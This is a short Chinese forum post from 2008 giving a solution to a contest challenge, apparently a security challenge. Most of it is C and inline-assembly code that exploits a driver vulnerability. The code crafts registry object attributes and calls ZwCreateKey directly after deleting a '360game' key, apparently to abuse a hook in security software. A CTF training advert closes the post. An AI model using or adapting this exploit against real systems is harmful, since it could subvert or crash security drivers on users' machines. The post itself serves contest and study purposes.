-
-
[分享]第三题的解法
-
2008-12-23 08:26
22689
-
利用驱动的漏洞:
核心代码:
HKEY hkey=(HKEY)"360game";
WCHAR xx[] = L"xxxx_fuck";
HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID p = GetProcAddress(hlib , "ZwCreateKey");
RegOpenKey(HKEY_LOCAL_MACHINE , "SYSTEM\\" , &hkey);
OBJECT_ATTRIBUTES oba ;
UNICODE_STRING strname ;
strname.Buffer = xx;
strname.Length = wcslen(strname.Buffer) * sizeof(WCHAR) ;
InitializeObjectAttributes(&oba , &strname ,0 , 0,(PVOID)0x80000000);
RegDeleteKey(hkey,"360game");
__asm{
push 0
push 0
push 0
push 0
lea eax,oba
push eax
push 0
push 0
call p
}
[CTF入门培训]顶尖高校博士及硕士团队亲授《30小时教你玩转CTF》,视频+靶场+题目!助力进入CTF世界